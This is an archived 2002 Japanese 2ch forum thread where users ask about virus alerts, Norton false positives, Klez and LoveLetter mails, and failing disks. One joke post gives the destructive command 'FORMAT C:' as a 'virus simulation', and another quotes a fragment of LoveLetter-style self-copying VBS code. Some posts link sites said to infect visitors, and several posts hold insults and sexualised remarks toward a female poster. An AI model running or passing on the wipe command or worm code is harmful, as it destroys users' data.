ネットに接続してアップデートしたほうがよいのでしょうか?
それとも、そのノートンはもう使い物にならないので削除したほうがよいのでしょうか・・?
質問ばかりで恐縮です。

499 :名無しさん@お腹いっぱい。:02/07/04 12:24
DOS画面からどうやってスキャンしたんだよ

500 :名無しさん@お腹いっぱい。:02/07/04 12:32
>>498 ネットに接続できなければバスター入れても同じだろ。
どのアンチウィルスソフトも最初にアップデートする必要があるんだから。

501 :名無しさん@お腹いっぱい。:02/07/04 12:37
あんちヴぃーるすも入れてない(使ってない)のに
ウィルス食らったことを大前提にしてたり
なんでもウィルスのせいにしたり
デマメールでうろたえてる匂いがする

Jdbgmgr.exeだったら笑うぞ。

502 :498:02/07/04 12:55
>>499
何かダイアログが出て、(なんだったか忘れましたが)
「dos画面からならスキャンできます」みたいなこと言われたので、
よくわからないまま「はい」とかを押したら勝手にdos画面になって、
ひととおりスキャンして、いくつかウイルスが見つかって、
スキャンが終わったら自動的に再起動しました。

>>500
おっしゃるとおりです。
入ってるノートンがあまりに古いので、それよりはマシだという程度の理由で、
バスター2002を入れようとしたのですけどね・・。

503 :名無しさん@お腹いっぱい。:02/07/04 12:59
ならまずウィルス名書かん事には何もわからんと思うが

504 :498:02/07/04 13:08
>>503
ウイルス名メモる前に再起動してしまったのでわかりませんでした。
もう一度やってみます。ありがとうございます。

>>501
テディベアにびびって削除してしまったあなたとは違いますのでご安心を。

505 :名無しさん@お腹いっぱい。:02/07/04 13:11
>498=504
テディベアにびびって削除してしまったあなたとは違いますのでご安心を。

あんた、人に聞いといて、その言い方はないんじゃないかい。


506 :名無しさん@お腹いっぱい。:02/07/04 13:11

498タンはあんな見え見えのデマにひっかかったのかな・・・?ハァハァ

507 :名無しさん@お腹いっぱい。:02/07/04 13:14
501ではないが、>>504下段、なんか態度悪いなぁ。答えてもらえんぞ。

508 :名無しさん@お腹いっぱい。:02/07/04 13:16
2chウィルス sage.exeも昔ちょびっとだけ流行ったね。 

509 :498:02/07/04 13:17
>>505
あまりに悪意あるレスにショックを受けたので。
それと、煽りに応じるのが礼儀かと思いまして。。

510 :名無しさん@お腹いっぱい。:02/07/04 13:18
>509
あんな程度で”悪意あるレス”だと思うなら、
ここで聞くほうが間違ってる。

511 :名無しさん@お腹いっぱい。:02/07/04 13:19
503へのレスと501へのレスのギャップがすごいな。

512 :名無しさん@お腹いっぱい。:02/07/04 13:21
>>509
悪意あるレスってのは>>506みたいなのを言うんだと思うが。

513 :名無しさん@お腹いっぱい。:02/07/04 13:21
長々と書いてあるわりに肝心の情報がないので、ああ書かれてしまうのだよ。
判断根拠がないので、前提から疑わなければいけなくなる。

514 :498:02/07/04 13:21
>>510
そうですね。では消えますです。
おさわがせしましたm(_ _)m

515 :501:02/07/04 13:24
アタシのために争うのはやめて!

516 :名無しさん@お腹いっぱい。:02/07/04 13:25
>>515
氏ね

517 :Virus Warning Message :02/07/04 15:57
借金まみれの身でありながらインターネットやる暇はあるらしい。
ウイルス対策せよ。
Received:from imlmta01.aics.ne.jp (157.205.253.210)
by ** with SMTP; **
Received:from virmta04.aics.ne.jp ([157.205.253.148])
by imlmta01.aics.ne.jp (InterMail vM.5.01.03.13 201-253-122-118-113-20010918)
with ESMTP id< 20020704012828_ULUP20472_imlmta01_aics_ne_jp@imlmta01.aics.ne.jp >
for< WealthbuildersRemove@thecenter.zzn.com >; **
Received:from Eqeuowvjp ([61.124.119.226]) by virmta04.aics.ne.jp
(InterMail vM.5.01.03.13 201-253-122-118-113-20010918) with SMTP id < 20020704012757_XCMJ20864_virmta04_aics_ne_jp@virmta04.aics.ne.jp >
for< WealthbuildersRemove@thecenter.zzn.com >; **
From:taro< taro@bar.or.jp >
To: WealthbuildersRemove@thecenter.zzn.com joem8788g44@hotbot.com
20020704012828_ULUP20472_imlmta01_aics_ne_jp@zao.aics.ne.jp
20020704012757_XCMJ20864_virmta04_aics_ne_jp@aso.aics.ne.jp
20020704012828_ULUP20472_imlmta01_aics_ne_jp@aso.aics.ne.jp
20020704012757_XCMJ20864_virmta04_aics_ne_jp@zao.aics.ne.jp
ntkngw019226_isdn_ppp_infoweb_ne_jp@zao.aics.ne.jp
61_124_119_226_Virus_Deleted@aso.aics.ne.jp
ウイルス対策せよ。
Subject:A humour game
Message-Id:< 20020704012757_XCMJ20864_virmta04_aics_ne_jp@virmta04.aics.ne.jp >
Date**
This is a very humour game
This game is my first work.
You're the first player.
I hope you would like it.

------------------ Virus Warning Message (on the network)

Found virus WORM_KLEZ.E in file install.exe
The file is deleted.

---------------------------------------------------------
馬鹿ヒーの佐藤さん
ある男の貧乏脱出物語
現 在 の 私
2000万の借金の返済を無事に終えました。
とてもほっとしています。
仕事は年に4〜5回、香港、パリ、ロスなどの出張をこなし、
普段は日本中を車や、新幹線、飛行機で、飛び回っています。とても充実しています。
http://muneyasu.com/pa-tsu/gennzai.html
http://muneyasu.com/index.html

518 :484、486:02/07/04 17:18
>>489
やっぱり感染してるんですか・・・
>>495
バスターでスキャンしても全然ヒットしないんです・・
>>497
全く同じ状況です。どうしていいものか困ってます。

皆さんレスありがとうございます。
497さんみたいにそのままにしておいていいものなんでしょうか?
オンラインスキャンでもヒットしないんです。
それでも感染してるんでしょうか?
質問ばかりですみません。

519 :cheshire-cat:02/07/04 19:03
>>518
検疫されていたってオチかもしれんが。
誤作動説もあるけど。

心配なら、バスターの常時スキャンを一旦停止して、Antidote簡易版でも使ってみれ。
http://www.vintage-solutions.com/Japanese/Antivirus/Super/

520 :名無しさん@お腹いっぱい。:02/07/04 21:15
http://tmp.2ch.net/test/read.cgi/download/1025717301/191-201]

ニュー速で見つけました。2ちゃんのスレなんだけど、踏むと感染するって言われました
踏んでしまった。・゚・(ノД`)・゚・。


521 :名無しさん@お腹いっぱい。:02/07/04 21:19
>>520
しません
どこぞのキチガイが、197のvbsのソースにセキュリティソフトが反応したのを
ウィルスに感染したーとかほざいてるだけだから。
つかみりゃわかるっしょ。んな情報に踊らされるのは
ノートンに踊らされて騒いでるキチガイと同レベルだぞ。

522 :名無しさん@お腹いっぱい。:02/07/04 21:20
197ってそのスレ内の197な。

523 :名無しさん@お腹いっぱい。:02/07/04 21:31
>>521
ありがとう。・゚・(ノД`)・゚・。

漏れはノートン(2001)は持ってるんだけど、使い方よく分からないヘタレなのです
スキャン(たぶん)してみたけど、何も反応しなかったので・・・
それも嫌だなー。・゚・(ノД`)・゚・。

524 :名無しさん@お腹いっぱい。:02/07/04 21:34
120Kくらいあるメールを
勢いで思わず開いたら、
なにも書かれてないメールでした。

後でウィルスソフトで調べてみますが、
最近こういったデマメールって流行ってるのかしら?

525 :491:02/07/04 21:36
>>524
Klezかもよ。

526 :名無しさん@お腹いっぱい。:02/07/04 21:37
ノートン使ってないからわからんが
常時htmlまでウィルスのコード検索してんのか?
無意味だしそんなのオフでいいから反応しなくていいよ。
exeをDLした時は100階くらいスキャンかけて欲しいがな。。
(マンキンの時にexe警戒しないで踏んじまう初心者の多い事・・・)

527 :cheshire-cat:02/07/04 21:37
>>524
htmlメルっすか?
確信持てないけど、念のためこちらにどんぞ。
http://pc.2ch.net/test/read.cgi/sec/1024255721/


528 :cheshire-cat:02/07/04 21:39
>>526
一応、メルスキャンを無効にしても、喰らったら常時スキャンの方で検出できませう。

529 :名無しさん@お腹いっぱい。:02/07/04 21:40
VBS.Internalというのに感染しているみたいですけど、
どんなウィルスですかおせーてくらさい。
おながいします

530 :名無しさん@お腹いっぱい。:02/07/04 21:42
UZEEEEEEEEEEEEEEEEEE
またダウソ板からかよ
ウィルスにかかってねーからもうくんな。

531 :名無しさん@お腹いっぱい。:02/07/04 21:43
つか直前のレスくらい見れ
>>520-521

532 :cheshire-cat:02/07/04 21:43
>>529
このスレのちょい上に書かれてる、2chにソース書き込まれたvilliの事っすか?

533 :名無しさん@お腹いっぱい。:02/07/04 21:44
>>529
ttp://216.239.35.100/search?q=cache:W95g0pV5cJwC:www.geocities.com/SiliconValley/Heights/3652/vinfo.html+VBS.Internal&hl=ja&ie=UTF-8

534 :名無しさん@お腹いっぱい。:02/07/04 21:48
>>530-533
あがとございました。
わたしがわるーございました。
ノートンが反応しただけでした。
ごめんなさい。

535 :484、486:02/07/04 21:58
>>519
アドバイスありがとうございました。
これでチェックしてみましたがやっぱりウィルスは検出されませんでした。
誤作動とかあるんですね。しばらく様子見てみます。

536 :名無しさん@お腹いっぱい。:02/07/05 01:34
質問です。VBS.Internalってどんなウイルスなんですか?

537 :名無しさん@お腹いっぱい。:02/07/05 01:58
uzai

538 :名無しさん@お腹いっぱい。:02/07/05 02:52
大変な事になりました。エロサイトいってからパソコンおかしくなってしまいました。
 具体的に言うと、モデムのランプがすごい速さで点滅してるんです(常に何かダウンロードしてる?)
 ウイルスなのかどうかもわかりません。助けてください、お願いします。

539 :名無しさん@お腹いっぱい。:02/07/05 04:40
>>538
パソコンに詳しい人の所へ持っていって何とかしてもらう。

540 ::02/07/05 06:03
おとなしく国際通話料金はらってね。
なんか検索すりゃーすむことわざわざきくやついっぱいいるねえ

541 :名無しさん@お腹いっぱい。:02/07/05 06:11
ごねれば払わなくて済むって聞いたよ。

542 :名無しさん@お腹いっぱい。:02/07/05 06:53
>>541
国際電話料金は、通信料だから支払う義務があります。
払わなくていいのはQ2。

543 :名無しさん@お腹いっぱい。:02/07/05 11:15
7/4にシステム吹っ飛ばすウィルスってある?
最新情報調べてもなかったから

544 :名無しさん@お腹いっぱい。:02/07/05 11:25
>>543 http://www.symantec.com/region/jp/sarcj/calendar/jul_2002.html

545 :名無しさん@お腹いっぱい。:02/07/05 14:30
age

546 :名無しさん@お腹いっぱい。:02/07/05 16:32
>>543
吹っ飛ばされたのか・・・・がんがれ。

547 :名無しさん@お腹いっぱい。:02/07/05 18:43
http://hub.weteuros.com/seek/sexy/13/index.html
ここウイルスに犯される

548 :名無しさん@お腹いっぱい。:02/07/05 18:48
なんか、さっきから2chアクセスするたびにVBS.LoveLetter.Aの感染警告
メッセージをノートン先生が出すのだが・・・

549 :名無しさん@お腹いっぱい。:02/07/05 18:49
>>548 ガイシュツ。このスレさかのぼれ。

550 ::02/07/05 18:51
それはVBS.Internalだべ。
らヴれたーはhttp://pc.2ch.net/test/read.cgi/sec/1000753945/
この>>38-39がひっかかってんじゃないか?

551 :名無しさん@お腹いっぱい。:02/07/05 18:56
どのウィルスかは問題じゃない、VBSだから同じこと

552 :名無しさん@お腹いっぱい。:02/07/05 19:02
>551
ふむふむ。(゜_゜)
じゃ、『やりおるな、ノートン先生!』ということで・・・

553 :名無しさん@お腹いっぱい。:02/07/05 19:19
質問です。klezウイルスって何ですか?
私は携帯から2ちゃんにアクセスしてるんですけど、影響はありますか?

554 :cheshire-cat:02/07/05 19:22
>>553
全く問題無いです。

555 :名無しさん@お腹いっぱい。:02/07/05 19:48
最近はやりのLOVE-LETTER-FOR-YOUって書いてあるスレ開いても、ノートン先生が何も反応しません。
何か問題でもあるんでしょうか?

556 ::02/07/05 20:01
無い

557 : :02/07/05 21:11
既出だったらスマン。
今ニュー速でloveletterウィルスかかったとかかかってないとかで騒いでいます。
これはウィルスですかね?
リンク踏んでも大丈夫ですかね?

ウイルスなわけだが
http://corn.2ch.net/test/read.cgi/news/1025863781/l50

558 :名無しさん@お腹いっぱい。:02/07/05 21:12
>>557
すぐ前に書いてあっても読めないのはあなたの頭が感染しているのでは?

559 : :02/07/05 21:16
>>558
loveletterについては>>555で書いてあるのは読んでいますけれど、
loveletterにかかったときの対策法については何も書いてませんよね?
だから改めて書いたのですが。

560 :名無しさん@お腹いっぱい。:02/07/05 21:17
>>559 この板のあちこちでガイシュツ、もううんざりだ。ニュー速へ帰れ。

561 : :02/07/05 21:20
>>560
他のスレを探したのですがloveletterについてのスレは見つかりません。
既出ならそのスレを貼っていただけますか?
そちらを見ますので。


562 :名無しさん@お腹いっぱい。:02/07/05 21:22
http://pc.2ch.net/test/read.cgi/sec/1023828379/l50

563 :名無しさん@お腹いっぱい。:02/07/05 21:23
http://www.google.co.jp/を開いてテキストボックスに
loveletter virus removeといれてEnterキーを押す。
すると削除方法を記述したページを自動的に検索して表示してくれる。
後はリンク先を読めば良い。

全てのウィルスの削除方法がこの板にないといけないのか?

564 :名無しさん@お腹いっぱい。:02/07/05 21:26
>>561 ニュー速住人はウィルスごとにスレッドが立ってると思いこんでいる。

565 : :02/07/05 21:29
>>563は死んでください

566 :563ではないが・・・:02/07/05 21:30
( ゚Д゚)ハァ?

567 : :02/07/05 21:31
今日はどのスレッドを見てもデジャヴ感覚が味わえる。





568 :名無しさん@お腹いっぱい。:02/07/05 21:32
隊長!涙目の557が逃げていきます!

569 :名無しさん@お腹いっぱい。:02/07/05 21:32
>>565
有り難いお申し出ですが、この度は遠慮しておきます。

570 :名無しさん@お腹いっぱい。:02/07/05 21:36

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.E
↑のレスでもちらほらみるがこの奇数月の6日に作動するワーム、今はやってるの?

明日どうなってるかな?

571 :名無しさん@お腹いっぱい。:02/07/05 21:41
>>570 Klez.E、Klez系スレッド part3
http://pc.2ch.net/test/read.cgi/sec/1024255721/

572 :名無しさん@お腹いっぱい。:02/07/05 23:42
当方ノートンインターネットセキュリティ2002を使っていますが、
初めてウイルスが検出しました。VBS.LoveLetter.Aです。それでそれを
修復しようとしたら出来ませんでした。それで今は検疫しています。

これからどうしたらいいのでしょうか?よろしくお願いします。
ちなみに最新ウイルス定義にしていても修復できませんでした。
当方パソコン初心者(女)です。わかりやすく説明お願いします。

573 ::02/07/05 23:44
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/


574 :名無しさん@お腹いっぱい。:02/07/05 23:49
(女)は余計だな(w

575 ::02/07/05 23:52
(女・独身・美女・性格良) で写真付きなら
教えて君でも親切に教えるけどな。

576 ::02/07/05 23:54
本人の写真であると、どうやって判別すんだ?

577 :572:02/07/06 00:06
>>573
見ました。という事は、ノートンの誤反応なのですね?
ウイルス感染ではないと?って事は、マイコンピュータのインターネット
オプションのInternet Temporary Filesの削除でいいんですね?
なんとなく判りましたのでその通りやってみました。
これで、もう一度一応ウイルススキャンしてみます。

みなさんの事を信用していない訳ではないんです。
本当にありがとうございました。
また結果報告します。


578 ::02/07/06 00:07
んじゃセキュ板よりってメモ紙もって写真とってもらうとか・・
いずれにせよ夢を持つのは大事だ。ハァハァ

579 :名無しさん@お腹いっぱい。:02/07/06 00:12
なんか今日知らないヤシから
「Internet Explorer 6」って件名のメールが届いてたんだが、これはウイルス??
144kぐらいだったんだけど

580 :名無しさん@お腹いっぱい。:02/07/06 00:13
572を騙ってグロ画像のリンクが貼られないことを望むばかり。

>>579
Klez.E、Klez系スレッド part3
http://pc.2ch.net/test/read.cgi/sec/1024255721/

581 : :02/07/06 01:21
少し上の方のレスが読めない方が多いこと多いこと


582 :名無しさん@お腹いっぱい。:02/07/06 01:27
質問したら答えてくれる。敢えて面倒なことをする必要はない。



ってことだろ。

583 : :02/07/06 04:18
>>572は、はんてんぐわるどーで十分。

584 :ウィルス疑似体験:02/07/06 16:32
FORMAT C:


585 :名無しさん@お腹いっぱい。:02/07/06 22:36
このスレを読み込んだら脳豚先生が反応したよ。なんで?


【国際】18歳女性教師が“合法的”に集団レイプされる −パキスタン
http://news.2ch.net/test/read.cgi/newsplus/1025954189/

586 :名無しさん@お腹いっぱい。:02/07/06 22:50
ファイル
C:\PROGRAM FILES\JANE\Logs\2ch\ニュース\ニュース速報+\1025955747.dat は
VBS.Network.E ウィルスに感染していました。
ファイルは削除されました。

ちがった、こっちのが感染してたんだ…
【ネット】看護学校受験ガイドのHPなどでメールアドレス大量流出
http://news.2ch.net/test/read.cgi/newsplus/1025955747/

587 :名無しさん@お腹いっぱい。:02/07/06 23:00
過去ログみました、理由が分かりました。

588 :名無しさん@お腹いっぱい。:02/07/07 08:24
最近、変わったメールが来るようになりますた。
以下、その内容。

ご無沙汰しております。
以前、何度かメールをやり取りしたユキです。
使えそうなサイトを見つけたのでメールしました。
http://www.ryoko.us/
お役にたつと嬉しいです。
では、また。

当然、メールのやり取りしたことも聞いたコトもない相手です。
貼り付けてあるアドレスってナンなんでしょう?
ブラクラ?それともやっぱりウィルスでしょうか?

589 :名無しさん@お腹いっぱい。:02/07/07 10:02
>>588
ただのSPAMでしょう。
といっても「Access Denied」と出て何もなかったですが。

590 :hitchcock:02/07/07 14:03
あの、以前にIEでアニメーションGIFを
アニメーションさせるように設定させたままだと
セキュリティーホールをつかれてしまうという問題が
あったとおもうんですが、あれはWIndows98
は問題ないんでしょうか?



591 :名無しさん@お腹いっぱい。:02/07/07 15:56
スキャンの種類: リアルタイム保護 スキャン
イベント: ウィルスが見つかりました
ウィルス名: VBS.LoveLetter.A

スキャンの種類: リアルタイム保護 スキャン
イベント: ウィルスが見つかりました
ウィルス名: VBS.LoveLetter.E

2ちゃんのどっかがおかしーぞ

592 :名無しさん@お腹いっぱい。:02/07/07 16:01
>>591
おそらくノートンの誤作動
http://pc.2ch.net/test/read.cgi/sec/1025872269/
というのがあった。

593 :名無しさん@お腹いっぱい。:02/07/07 16:02
>>591 ノートンがvbsウィルスのソースに誤反応してますた
スマソ

594 :名無しさん@お腹いっぱい。:02/07/07 16:08
http://oofun.com/annoying.shtml
友達にこのサイトのリンクをクリックしてみろといわれてやったら、
ブラクラでは無いでしょうが、ウィルスらしいものを貰ったようです。
本当にパソコンに自身のある方のみ、誰かこのサイトが何か解明してください。
お願いします。不安です。
VBS.Internalというファイルがノートンで検知されたのですが、隔離さえ出来ません。

595 :名無しさん@お腹いっぱい。:02/07/07 16:08
http://pc.2ch.net/test/read.cgi/win/1026024447/l50
ウィルスを確実に喰らうサイト

596 :名無しさん@お腹いっぱい。:02/07/07 16:29
なぜalertごとに"script"で挾むのか問い詰めたいサイトですね

597 :名無しさん@お腹いっぱい。:02/07/07 16:34
alertがこんなにあるなんて!すごいですね

598 :ウイルスコレクター:02/07/07 16:52
俺はHDにそのまま保存されていた
Happy99をHDを整理していて気が付いた。
間違えて実行してしまうととてつもなくやばーい事になるので
とりあえず圧縮をかける事にした。

えーとZIP圧縮、ZIP圧縮と・・・
俺はそう思いながら圧縮アプリにドラッグしようとマウスを近づけた。
しかし・・・!そのとき手が滑って

「ああっ!」
そう、間違えて他のエグザにドロップ&ドラッグしてしまったのだ

エグザにエグザを重ねるとどうなるか知っているだろうか・・・?

タイムマシンで恐竜時代に行ったのは良いものの、
岩盤と出現場所が重なり、分子が重なり、
熱核爆発を起こしてマシンもろとも蒸発する。正にそんな感じ

HDが少し音をたてたかと思うと次の瞬間Windowが出現した

(や、やっちまった・・・)
時はすでに遅し
どんどん打ちあがるディスプレイの上の打ち上げ花火・・・

             ∩
                 | |
        ∧_∧   | |   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       ( ´Д`)//  < 先生!僕を助けてください(汗
      /       /    │
     / /|    /       \_____________
  __| | .|    |    
  \   ̄ ̄ ̄ ̄ ̄ ̄ ̄\
  ||\             \
  ||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄|| ̄
  ||  || ̄ ̄ ̄ ̄ ̄ ̄ ̄||
     .||              ||

俺はウイルス集めだしてから初めて敗北した・・・
(まあ、後で直ぐに直ったけどね。W2Kだし

皆さんもウイルスには十分気をつけましょう。

599 :別のウィルスコレクター:02/07/07 16:59
洩れも実はklez.Hを実行してしまったことは内緒な。

600 :名無しさん@お腹いっぱい。:02/07/07 17:24
携帯(ていうかエッジ)に最近大量の英語メールがくるのですが
今日確認したら今まで受信したメールボックスの中身が全部消えていました。
今日びは携帯にもウイルスがあるのですか?
ちなみに添付書類が化けたような文字列ばかりのメールです。
最初の一文がAAAAAAAA…って続いてるような感じでした。

601 :名無しさん@お腹いっぱい。:02/07/07 17:27
ウイルス集めてはpgpで暗号化してた奴もいたな

602 :1:02/07/07 18:06
あの、以前にIEでアニメーションGIFを
アニメーションさせるように設定させたままだと
セキュリティーホールをつかれてしまうという問題が
あったとおもうんですが、あれはWIndows98
は問題ないんでしょうか?


603 :名無しさん@お腹いっぱい。:02/07/07 18:06
c.Copy(dirsystem&"\うんこ.TXT.vbs")

604 :教えてください:02/07/07 18:35
「VBS.LoveLetter」に感染すると、
Microsoft Outlookのアドレス帳にある電子メールアドレスや、mIRCを介してインターネット上のチャットルームに自分自身を送信します。

とのことですが、それは一回きりですか?
パソコン内にウィルスが存在している限り何度でも行われるのでしょうか?

605 :名無しさん@お腹いっぱい。:02/07/07 18:36
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/


606 :名無しさん@お腹いっぱい。:02/07/07 19:52
そんなことよりさ、ちょいと聞いてくれよ。スレにあんま関係ないんだけどさ。

このあいだ、久々に2ch覗いたんです。2ch。
そしたらなんか半角板のスレ開いたらパソコンが変な動きするんです。
で、よく見たらなんかノーd先生が警告出して騒いでるんです。
で、ウイルススレ見てみたらどうやら原因は先生の誤反応なんです。
もうね、先生アホかと。馬鹿かと。
先生な、普段仕事してないのに厨房コピペに一々反応なんかすんな、ボケが。
厨房のコピペだよ、コピペ。
なんか親子連れとかも助けてレスしてるし。一家4人で誤反応か。おめでてーな。
よーしパパセキュリティー板で原因聞いちゃうぞー、とか言ってるの。もう見てらんない。
お前らな、マカフィーやるから安心しろと。
誤反応ってのはな、もっと殺伐としてるべきなんだよ。
ノーd先生がいつ誤反応しちまってもおかしくない、
反応するか反応しないかの、そんな雰囲気がいいんじゃねーか。女子供は、すっこんでろ。
で、やっと騒ぎが収まったかと思うと、ウイルス対策スレがいっぱい立ってるんです。
そこでまたぶち切れですよ。
あのな、対策スレなんてきょうび流行んねーんだよ。ボケが。
得意げな顔して何が、誤反応に注意!だ。
お前は本当に2chネラーかと問いたい。問い詰めたい。小1時間問い詰めたい。
お前、他人から仕入れたその場限りの知識で自慢したいだけとちゃうんかと。
先生通の俺から言わせてもらえば今、先生通の間での最新流行はやっぱり、
コールセンターに電話、これだね。
あのー誤反応がすごいんですけど。厨房対策に誤反応多めにしてくれ。これが通の頼み方。
しかしこれを頼むと次から死満テックにマークされるという危険も伴う、諸刃の剣。
素人にはお薦め出来ない。
まあお前ら、ド素人は、マカフィーでもインストしてなさいってこった。

                       

607 :名無しさん@お腹いっぱい。:02/07/07 20:15
とあるHPにアクセスしたところ、タイトルが「C」となっている
小ウィンドウが現れました。すぐに閉じたのですが、閉じるまで
に時間がかかりました。
その後何の問題もなくネットを続け、パソコンの電源オフ。
先程パソコンを起動したところ、ハードディスクを作り直し
ますか?」とのダイアログが出ました。
キャンセルし、その後再起動しても何も起らないのですが、
初めての経験で不安です。
ウィルスに感染しているのでしょうか?
知識のある方々、教えて下さい。

608 :cheshire-cat:02/07/07 20:22
>>607
該当サイトのURLと、OSやブラウザのその時の設定等も書いた方が、他の人もレスしやすいかと。
不安なら、ウイルスのスキャンしたらどうっしょか。

609 :7743:02/07/07 20:23
最近よくklezが送られてくるんだが、もちろん送信元のアドレスは適当に拾ってきてある。
が、、だ。メールを発射したPCのドメイン情報とか時間は詐称してないような気がするのだが
実際のところどうなのか教えてくらはい。
 あと、リターンパスには本当の送信者な気がしなくも・・・・・

610 :607:02/07/07 20:27
>>608
ウィルスソフト入れてないんです・・・。
OSはマックOS8.6。ブラウザはIE5.0。設定とは何の設定でしょうか?

URLは履歴がないので分かりません。

611 :cheshire-cat:02/07/07 20:28
>>609
その通りだと思いまする。

でも漏れのメアドに毎回送って来る人は、Nifty利用者だという事を除くと情報が無いので、気の毒です。

612 :cheshire-cat:02/07/07 20:40
>>610
Macかぁ。IE5.0って古くない?
IE5.1だかをインスコしたらどうっしょ。
5.0だとファイルを勝手にダウンロード&強制実行の穴があったかと。
http://www.microsoft.com/japan/mac/products/ie/

Norton用のSymantec製品体験版、ここから落とせまする。
http://www.symantec.com/region/jp/trial/trial.html

えとですね。
「MacはWindows製品向けvilliやトラップが多いので、とりあえず安全」、ちゅうものでもないっす。

613 :7743:02/07/07 20:42
>>611さん。
やっぱそうですよね。。

漏れにくるのはOCNからなんで、何県の何地方までわかりますぜ・・・といっても押しかけるわけじゃないから関係ないか(藁

614 :cheshire-cat:02/07/07 20:45
>>613
Return-Pathのメアド宛てに、警告メル送ったらどうっしょ。

615 :7743:02/07/07 20:53
>>614

このスレの様子をしばらく静観して、それがあってるなら
そうしようと思いまふ。


616 :cheshire-cat:02/07/07 21:03
>>615
KLEZスレで、かなり以前から同様の話題が出ていると思いまする。
http://pc.2ch.net/test/read.cgi/sec/1024255721/

617 :名無しさん@お腹いっぱい。:02/07/07 21:04
VBS.Love Letter.A
上記のがノートンで検出されたんですが・・・。
何をするウイルスでしょうか??


618 :cheshire-cat:02/07/07 21:06
>>617
これ?
http://pc.2ch.net/test/read.cgi/sec/1025872269/

619 :名無しさん@お腹いっぱい。:02/07/07 21:06
>>617
きっと誤検出だと思うけど

ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

620 :名無しさん@お腹いっぱい。:02/07/07 21:10
どうも・・・。
誤作動なら安心です。
そういえば2ちゃんのどこか開いたらダウンしますかと出たかも・・・。
お手数かけました。

621 :607:02/07/08 01:33
>>612
ありがとうございました。
ダウンロードしてきます。

622 :名無しさん@お腹いっぱい。:02/07/08 12:35
携帯に最近よく入るウイルスメールなんですけど
ヘッダから公開してもよろしいでしょうか?昨日受信関係のデータが
全部消沈しました。
差出人は毎回変わっていて知り合いの知り合いの名前だったりもするので
あてにはならないとは思うのですが、本文が文字列なので
種類くらいは判別できるかなと思いまして…
文字列のコピペくらいはここでしても支障ないですよね?

623 :名無しさん@お腹いっぱい。:02/07/08 19:58
昨日から、もう一台のPCで作業中に青画面で、ドライブCに書き込めません
というエラーがでるようになりました。スキャンディスクをかけても同じエラーで
途中で止まってしまいます。それで思い切ってクリーンインストールする事にしました。
ところがCドライブをフォーマット後、ウィンドウズMeをインストール中に
BootSector Write !
VIRUS: Continue(Y/N)?
という表示がでて止まってしまいます。この時Y、Nどちらを押しても
反応はありません。その後FDISKで領域削除、再確保からやってみよう
と思いましたが、そこでも上の表示が出てFDISKを完了できません。
これってウィルスでしょうか?(VIRUSって書いてあるし・・)
OSが消えてるのでオンラインウィルススキャンなどもできません。
途方にくれてここに書き込んでみました。
解決法ありますでしょうか?


624 : :02/07/08 20:05
たった今、差出人が「 2ch <2ch@2ch.net>」でタイトルが「A special new game 」
っていう、怪しい添付ファイル(INSTALL.EXEとHTMLファイル)つきのメールが来ました。
2ちゃんねらーだと知ってて送ってきたのか、無差別なものなのか気になります。
このスレでいいのかどうかわかりませんが、どなたか同じメールを受け取った人はいませんか。

625 :名無しさん@お腹いっぱい。:02/07/08 20:08
自分の情報消してヘッダー見せて下さい

626 :初級ネット板にいた者:02/07/08 20:09
>>624
こら、いきなり質問するなとちゃんと注意して誘導しただろうが。
このスレとかKlesスレの前の方を見ろと書いただろうが。
それとも初級ネットからでなく、自発的にマルチなのか?

627 : 624:02/07/08 20:11
>>625 以下がヘッダです。


Return-Path: <kikaku@earthsupport.co.jp>
Received: from smtp.net-keeper.net (smtp.net-keeper.com [210.157.11.225]) by **********.dti.ne.jp (1.01) with ESMTP id g68AEku08477 for <**********.dti.ne.jp>; Mon, 8 Jul 2002 19:14:46 +0900 (JST)
Received: from Gdgvfhd (061196244058.cidr.odn.ne.jp [61.196.244.58])
by smtp.net-keeper.net (8.11.2/Oh-2001-01-01) with SMTP id g68ACoq29509
for <**********dti.ne.jp>; Mon, 8 Jul 2002 19:12:50 +0900 (JST)
Date: Mon, 8 Jul 2002 19:12:50 +0900 (JST)
Message-Id: <200207081012.g68ACoq29509@smtp.net-keeper.net>
From: 2ch <2ch@2ch.net>
To: **********.dti.ne.jp
Subject: A special new game
MIME-Version: 1.0


628 : 624:02/07/08 20:13
>>626
すいません、自分でスレの内容から判断してここに書きこみました。
何度も質問を書きこんでスレを消費するのもまずいかなと思って。

629 : :02/07/08 20:15
よってたかって叩かれないように注意してやったのに
聞く気がないなら勝手にしろ。

630 :cheshire-cat:02/07/08 20:26
>>623
ブートセクタが壊れたのを、「おいおい、Villiじゃねぇの?」、ってパソが警告しとるだけなんじゃないでしょか。

ハカーイHDを、もう一台のパソのHDにスレーブ接続して作業してみてはどうっしょ。
物理的に「逝っちゃった」、って可能性もアリだけど。

631 :名無しさん@お腹いっぱい。:02/07/08 20:27
>>624
2chとは直接関係ないメールです。


632 :624:02/07/08 20:29
>>631
ありがとうございます。


633 :623:02/07/08 20:45
>>630 レスありがとうございます。
その方法を試してみます。Dドライブだけでも助かればいいのですが・・

634 :cheshire-cat:02/07/08 20:59
>>633
そ言えば、起動ディスクから修復できたような。

メモありました。
http://homepage2.nifty.com/winfaq/howtoboot.html

635 :cheshire-cat:02/07/08 21:01
漏れの再レス、ちょっと遅かった、かな?

636 :623:02/07/08 22:59
とりあえずハカーイHDの中身は取り出せました。
オンラインスキャンでは何も出てこなかったのですが、
上のページのマスターブートレコードの修復法を試したら、また
BootSector Write !
VIRUS: Continue(Y/N)?
これが出て駄目でした。今度はY,Nに反応するようでした。
結局起動ドライブとして使えない様なので新しいHDD買ってきます。
壊れたほうはとりあえず隔離しときました。データドライブとしても
あやしいので・・ありがとうございましたー。

637 :名無しさん@お腹いっぱい。:02/07/09 12:56
>636
もう遅いかな?
BIOS設定を変えてみて下さい

638 :名無しさん@お腹いっぱい。:02/07/09 16:21
